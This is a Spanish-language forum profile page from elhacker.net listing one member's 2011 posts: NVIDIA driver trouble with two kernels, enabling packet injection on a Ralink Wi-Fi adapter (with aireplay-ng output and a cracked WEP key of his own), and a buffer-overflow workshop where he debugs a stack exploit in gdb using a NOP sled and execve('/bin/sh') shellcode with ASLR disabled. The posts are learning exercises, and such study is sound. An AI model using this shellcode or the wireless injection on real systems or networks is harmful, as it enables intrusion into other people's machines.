pues yo me acomodo en gnome con gtk, en python se me hizo sencillo, aunque no he usado QT porque casi no me gusta KDE aunque se que no es necesario KDE para usar QT, pero bueno, es solo por preferencia
salu2
salu2
- Bienvenido a Test Foro de elhacker.net SMF 2.1.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#342
GNU/Linux / Re: tengo 2 kernel diferentes, pero no se si sea posible usarlos sin modificar algo.
17 Febrero 2011, 03:45 AM
hola
sip, a eso me refiero... tengo 2 kernel diferentes, y tengo que usar para la tarjeta de video nvidia x86-195.36.24-pkg1.run pero para el nuevo kernel que instale tengo que usar el controlador x86-270.18.run... , y no se si es posible instalar los 2 y solo usar el que necesite....
encontre que podia hacer un backup de nvidia.ko pero cuando instalo los drivers me alerta que removera todo
Si, pero creo a Debian squeeze aun no liberan el kernel con soporte para el ralink que tengo... intente recompilar el codigo pero en la zona de wireless no encuentro ralink, y en el nuevo kernel si lo encontre, y de hecho si funciona ralink pero no puedo hacer auditorias y en el kernel nuevo puedo hacer todo
Si, pero tengo fallas al no instalar drivers o instalar lo que viene por default en debian con compiz, y he leido en google que mientras siga siendo propietario NVIDIA, hacerlo que funcione 100% bien.... aun no es totalmente posible aunque han logrado hacer que funcione bien
ojala sea posible hacer un cambio de driver rapido, sino pues instalare los drivers cada que se necesite, de todas fomas no lo hare todo el tiempo, solo cuando vaya a utilizar ralink para auditorias o inyecciones
salu2
salu2
CitarNo he entendido del todo lo que quieres decir pero...tu puedes tener 5, 10, 20 kernels instalados, eso da igual. Al instalar un nuevo controlador en el nuevo kernel, el otro dejará de funcionar en el viejo. (No se si me explico bian xD)
sip, a eso me refiero... tengo 2 kernel diferentes, y tengo que usar para la tarjeta de video nvidia x86-195.36.24-pkg1.run pero para el nuevo kernel que instale tengo que usar el controlador x86-270.18.run... , y no se si es posible instalar los 2 y solo usar el que necesite....
encontre que podia hacer un backup de nvidia.ko pero cuando instalo los drivers me alerta que removera todo
CitarSi te refieres a tener dos kernels instalados a la vez y poder arrancar desde cualquiera de ellos disponiendo del módulo de nvidia, simplemente haz un backup de ese módulo (nvidia.o, o nvidia.ko) antes de instalar el driver para el nuevo kernel. Una vez instalado restauras y listo.
CitarY buscaste soporte en el mismo kernel para tu ralink ?
Si, pero creo a Debian squeeze aun no liberan el kernel con soporte para el ralink que tengo... intente recompilar el codigo pero en la zona de wireless no encuentro ralink, y en el nuevo kernel si lo encontre, y de hecho si funciona ralink pero no puedo hacer auditorias y en el kernel nuevo puedo hacer todo
CitarPues claro... cuando tienes un kernel y este es el que estas usando para iniciar tu sistema GNU/Linux, entonces todos los drivers que estes instalando o estes cargando, estaran siendo en una version especifica o aceptable para el kernel que estas cargando, ya que OJO, no para todo siempre tienes que bajar un drivers... o acaso no sabes que es un Kernel ?
Si, pero tengo fallas al no instalar drivers o instalar lo que viene por default en debian con compiz, y he leido en google que mientras siga siendo propietario NVIDIA, hacerlo que funcione 100% bien.... aun no es totalmente posible aunque han logrado hacer que funcione bien
ojala sea posible hacer un cambio de driver rapido, sino pues instalare los drivers cada que se necesite, de todas fomas no lo hare todo el tiempo, solo cuando vaya a utilizar ralink para auditorias o inyecciones
salu2
salu2
#343
Wireless en Linux / Re: puedo hacer inyeccion con mi ralink si hice un test con aireplay-ng?
17 Febrero 2011, 01:36 AM
a ok, gracias... es que antes lo intente con un realtek y si me funciono... pero muy lento y a veces no lo hacia bien... y no encontre athero
salu2
salu2
#344
GNU/Linux / tengo 2 kernel diferentes, pero no se si sea posible usarlos sin modificar algo.
16 Febrero 2011, 01:59 AM
hola
Estuve instalando un USB para red Ralink, pero para hacerlo tuve que instalar un kernel diferente, el que tenia era la version linux-image-2.6.32-5-686 pero para poder hacer funcionar la tarjeta y hacer auditorias tuve que instalar la version linux-image-2.6.38-rc1+
el problema esta en que para entrar en la version 2.6.38 tuve que instalar una version diferente del controlador de la que ya tenia instalada en mi tarjeta de video NVIDIA, tuve que instalar la version x86-270.18.run
pero antes tenia x86-195.36.24-pkg1.run.... hay algun problema con los demas programas instalados en m computadora por ser un kernel diferente?...porque creo virtualbox si me parece con error.
para no entrar en conflictos, es necesario desinstalar e instalar el driver de mi tarjeta dependiendo de la version del kernel que quiera usar? o hay alguna otra forma de tener acceso en los dos kernel sin reisntalar o quitar el controlador de video?
salu2
Estuve instalando un USB para red Ralink, pero para hacerlo tuve que instalar un kernel diferente, el que tenia era la version linux-image-2.6.32-5-686 pero para poder hacer funcionar la tarjeta y hacer auditorias tuve que instalar la version linux-image-2.6.38-rc1+
el problema esta en que para entrar en la version 2.6.38 tuve que instalar una version diferente del controlador de la que ya tenia instalada en mi tarjeta de video NVIDIA, tuve que instalar la version x86-270.18.run
pero antes tenia x86-195.36.24-pkg1.run.... hay algun problema con los demas programas instalados en m computadora por ser un kernel diferente?...porque creo virtualbox si me parece con error.
para no entrar en conflictos, es necesario desinstalar e instalar el driver de mi tarjeta dependiendo de la version del kernel que quiera usar? o hay alguna otra forma de tener acceso en los dos kernel sin reisntalar o quitar el controlador de video?
salu2
#345
Wireless en Linux / puedo hacer inyeccion con mi ralink si hice un test con aireplay-ng?
16 Febrero 2011, 01:43 AM
hola
una pregunta... ya logre hacer funcionar en debian squeeze mi USB ralink, estuve leyendo y leyendo en google y encontre que tenia que instalar kernel 2.6.38-rc1+, parchear wireless, quitar codigos y parchear aircrack, etc... y por fin lo logre
ahorita logre descifrar mi clave wep, y con aireplay-ng --test mon0 ver si hacia inyecciones
lo hice tanto en wifiway 2.0 como en debian y las respuestas son muuuy parecido, pero con pequeñas diferencias si lo intento varias veces, la parte de No Answer "creo" a veces me sale diferente, y en 29/30 %96 a veces me sale 100%... no se si eso sea malo?
Pero eso quiere decir que mi ralink puede hacer auditorias con aircrack, wireshark e incluso inyecciones con ettercap?
salu2
una pregunta... ya logre hacer funcionar en debian squeeze mi USB ralink, estuve leyendo y leyendo en google y encontre que tenia que instalar kernel 2.6.38-rc1+, parchear wireless, quitar codigos y parchear aircrack, etc... y por fin lo logre
ahorita logre descifrar mi clave wep, y con aireplay-ng --test mon0 ver si hacia inyecciones
lo hice tanto en wifiway 2.0 como en debian y las respuestas son muuuy parecido, pero con pequeñas diferencias si lo intento varias veces, la parte de No Answer "creo" a veces me sale diferente, y en 29/30 %96 a veces me sale 100%... no se si eso sea malo?
Citar18:21:46 Trying broadcast probe requests...
18:21:48 No Answer...
18:21:48 Found 1 AP
18:21:48 Trying directed probe requests...
18:21:48 00:1E:C7:XXXXXXXX - channel: 11 - 'MAXX '
18:21:49 Ping (min/avg/max): 1.662ms/27.221ms/38.121ms Power: -41.72
18:21:49 29/30: 96%
18:21:49 Injection is working!
Pero eso quiere decir que mi ralink puede hacer auditorias con aircrack, wireshark e incluso inyecciones con ettercap?
salu2
#346
Bugs y Exploits / Re: [Taller] Curso Exploiting elhacker.net 2011 : Grupo 1
14 Febrero 2011, 01:10 AM
pues tengo skype static, linux debian squeeze, y openssh-client
es necesario tambien instalar un servidor ssh?.... sino para instalar ssh, porque solo tengo el cliente "openssh-client"
una pregunta sobre la version de linux
como mencione tengo debian y estuve haciendo un exploit que posteo Sagrini y por mas que lo intente, el exploit no me funciono, creen que para no meterme en problemas de que algo no me funcione, sea necesario instalar en virtualbox la misma version de ubuntu con la que ustedes hara esto?
si creen que sea recomendable... que version de ubuntu tengo que descargar?
salu2
es necesario tambien instalar un servidor ssh?.... sino para instalar ssh, porque solo tengo el cliente "openssh-client"
una pregunta sobre la version de linux
como mencione tengo debian y estuve haciendo un exploit que posteo Sagrini y por mas que lo intente, el exploit no me funciono, creen que para no meterme en problemas de que algo no me funcione, sea necesario instalar en virtualbox la misma version de ubuntu con la que ustedes hara esto?
si creen que sea recomendable... que version de ubuntu tengo que descargar?
salu2
#347
Bugs y Exploits / Re: [First BoF Linux attack : Sagrini 2010 : elhacker.net] [Funciona!!!]
11 Febrero 2011, 20:15 PM
no... mira, de forma sencilla
RET
si pongo RET con 3 AAA
Citarroot@lainux:/home/the-gazette/Desktop/ex# echo 0 > /proc/sys/kernel/randomize_va_space
root@lainux:/home/the-gazette/Desktop/ex# cat /proc/sys/kernel/randomize_va_space
0
root@lainux:/home/the-gazette/Desktop/ex# exit
exit
the-gazette@lainux:~/Desktop/ex$ gcc -o vuln vuln.c --no-stack-protector -g -z execstack
the-gazette@lainux:~/Desktop/ex$ ./vuln $(perl -e 'print "\x90" x 11 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "\x0c\xf4\xff\xbf"')
the-gazette@lainux:~/Desktop/ex$
RET
Citar(gdb) r AAAA
Starting program: /home/the-gazette/Desktop/ex/vuln AAAA
Breakpoint 1, vuln (buff=0xbffff682 "AAAA") at vuln.c:8
8 strcpy (buffer, buff);
(gdb) x/x buffer
0xbffff40c: 0xb7e9ba75
(gdb) x/x buff
0xbffff682: 0x41414141
si pongo RET con 3 AAA
Citar(gdb) x/x buffer
0xbffff40c: 0xb7e9ba75
(gdb) x/x buff
0xbffff682: 0x00414141
(gdb)
#348
Bugs y Exploits / Re: [First BoF Linux attack : Sagrini 2010 : elhacker.net] [Funciona!!!]
11 Febrero 2011, 19:23 PM
ya desactive randomize_va_space y si estoy utilizando ese mismo codigo, igualmente hice copy paste
para sobreescribir si son 44
44-4-4-25 = 11
al compilar tengo que agregar -g sino me aparece
para que sobreescriba todo tengo que usar 4 AAAA en vez de 3
Esto no entiendo... tiene que salirme
en vez de esto... o no importa?
Cambie ret
paso a paso
aumente en 12 solo por la curiosidad de las 4 AAAA y use 10 pero tampoco y use 0xbffff682 y tampoco
para encontrar ret
salu2
para sobreescribir si son 44
44-4-4-25 = 11
al compilar tengo que agregar -g sino me aparece
Citar(gdb) x/x buffer
No symbol table is loaded. Use the "file" command.
(gdb) q
para que sobreescriba todo tengo que usar 4 AAAA en vez de 3
Esto no entiendo... tiene que salirme
Código [Seleccionar]
0xbffff904: 0x00000000 <----en vez de esto... o no importa?
Código [Seleccionar]
0xbffff40c: 0xb7e9ba75 <-----Cambie ret
Código [Seleccionar]
r $(perl -e 'print "\x90" x 11 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "\x0c\xf4\xff\xbf"') <-----
paso a paso
Código [Seleccionar]
(gdb) r $(perl -e 'print "\x90" x 15 . "B"x25 . "XXXX"')
Starting program: /home/the-gazette/Desktop/ex/vuln $(perl -e 'print "\x90" x 15 . "B"x25 . "XXXX"')
Program received signal SIGSEGV, Segmentation fault.
0x58585858 in ?? ()
(gdb) r $(perl -e 'print "\x90" x 15 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "XXXX"')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/the-gazette/Desktop/ex/vuln $(perl -e 'print "\x90" x 15 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "XXXX"')
Program received signal SIGSEGV, Segmentation fault.
0x58585858 in ?? ()
(gdb) br vuln
Breakpoint 1 at 0x80483fa: file vuln.c, line 7.
(gdb) r AAAA
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/the-gazette/Desktop/ex/vuln AAAA
Breakpoint 1, vuln (buff=0xbffff682 "AAAA") at vuln.c:7
7 strcpy (buffer, buff);
(gdb) x/x buffer
0xbffff40c: 0xb7e9ba75
(gdb) x/x buff
0xbffff682: 0x41414141
(gdb) r $(perl -e 'print "\x90" x 11 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "\x0c\xf4\xff\xbf"')
Starting program: /home/the-gazette/Desktop/ex/vuln $(perl -e 'print "\x90" x 11 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "\x0c\xf4\xff\xbf"')
Breakpoint 1, vuln (
buff=0xbffff65e "\220\220\220\220\220\220\220\220\220\220\220\061\300Ph//shh/bin\211\343P\211\342S\211\341\260\v̀\f\364\377\277") at vuln.c:7
7 strcpy (buffer, buff);
(gdb) c
Continuing.
Program exited with code 0334.aumente en 12 solo por la curiosidad de las 4 AAAA y use 10 pero tampoco y use 0xbffff682 y tampoco
para encontrar ret
Código [Seleccionar]
(gdb) r AAAA
Starting program: /home/the-gazette/Desktop/ex/vuln AAAA
Breakpoint 1, vuln (buff=0xbffff682 "AAAA") at vuln.c:8
8 strcpy (buffer, buff);
(gdb) x/x buffer
0xbffff40c: 0xb7e9ba75
(gdb) x/x buff
0xbffff682: 0x41414141
salu2
#349
Wireless en Linux / Re: ayuda puede explicar de como instalar los drivers para wifislax rtl 8185
11 Febrero 2011, 00:43 AM
yo encontre esto haber si te sirve
http://foro.elhacker.net/wireless_en_linux/como_instalar_usb_encore_enuwig2_chipset_realtek_rtl8187b_en_wifislax_31-t206923.0.html
http://foro.elhacker.net/wireless_en_linux/como_instalar_usb_encore_enuwig2_chipset_realtek_rtl8187b_en_wifislax_31-t206923.0.html
#350
Bugs y Exploits / Re: [First BoF Linux attack : Sagrini 2010 : elhacker.net] [Funciona!!!]
10 Febrero 2011, 08:27 AM
hola
Pues lo estuve intentando, tambien de esta manera, conte las veces de nop's que se necesitaban y no hubo ninguna shell
ya tambien lo intente con perl, hice copy paste de los codigos y nada, compile las cosas como me dijeron y tampoco
me di cuenta de algo... al revisarlo con GDB, me di cuenta que al poner "r AAA", cuando trate de sacar el RET, me di cuenta que buffer no queda asi
Me queda de esta manera
y si coloco x/x buff
alli estan los 41, o por lo menos eso en Windows para mi era señal de vulnerabilidad
intente con 0xbffff40c y 0xbffff682 y con ninguno de los 2, como mencione calcule too, y le iba aumentando poco a poco, pero en el comando "c" en gdb, solo me decia
(gdb) c
Continuing
y le aumente hasta que llegue a 15 me salio
Program received signal SIGSEGV, Segmentation fault.
0xbffff69c in ?? ()
no se si alli este el problema, aunque me imagino que sip
uso debian 6.0 squeeze
-------------------------------------
mr. blood
perdon si no te he podido agregar, pero como veras en estos momentos no he podido entrar mucho al foro, pero en cuanto pueda te agrego y vemos eso.
salu2
Pues lo estuve intentando, tambien de esta manera, conte las veces de nop's que se necesitaban y no hubo ninguna shell
ya tambien lo intente con perl, hice copy paste de los codigos y nada, compile las cosas como me dijeron y tampoco
me di cuenta de algo... al revisarlo con GDB, me di cuenta que al poner "r AAA", cuando trate de sacar el RET, me di cuenta que buffer no queda asi
Código [Seleccionar]
Breakpoint 1, vuln (buff=0xbffffb60 "AAA") at vuln.c:7
7 strcpy (buffer, buff);
(gdb) x/x buffer
[b]0xbffff904[/b]: 0x00000000Me queda de esta manera
Código [Seleccionar]
Breakpoint 1, vuln (buff=0xbffff682 "AAAA") at vuln.c:7
7 strcpy (buffer, buff);
(gdb) x/x buffer
0xbffff40c: 0xb7e9ba75
(gdb)
y si coloco x/x buff
Código [Seleccionar]
(gdb) x/x buff
0xbffff682: 0x41414141alli estan los 41, o por lo menos eso en Windows para mi era señal de vulnerabilidad
intente con 0xbffff40c y 0xbffff682 y con ninguno de los 2, como mencione calcule too, y le iba aumentando poco a poco, pero en el comando "c" en gdb, solo me decia
(gdb) c
Continuing
y le aumente hasta que llegue a 15 me salio
Program received signal SIGSEGV, Segmentation fault.
0xbffff69c in ?? ()
no se si alli este el problema, aunque me imagino que sip
uso debian 6.0 squeeze
-------------------------------------
mr. blood
perdon si no te he podido agregar, pero como veras en estos momentos no he podido entrar mucho al foro, pero en cuanto pueda te agrego y vemos eso.
salu2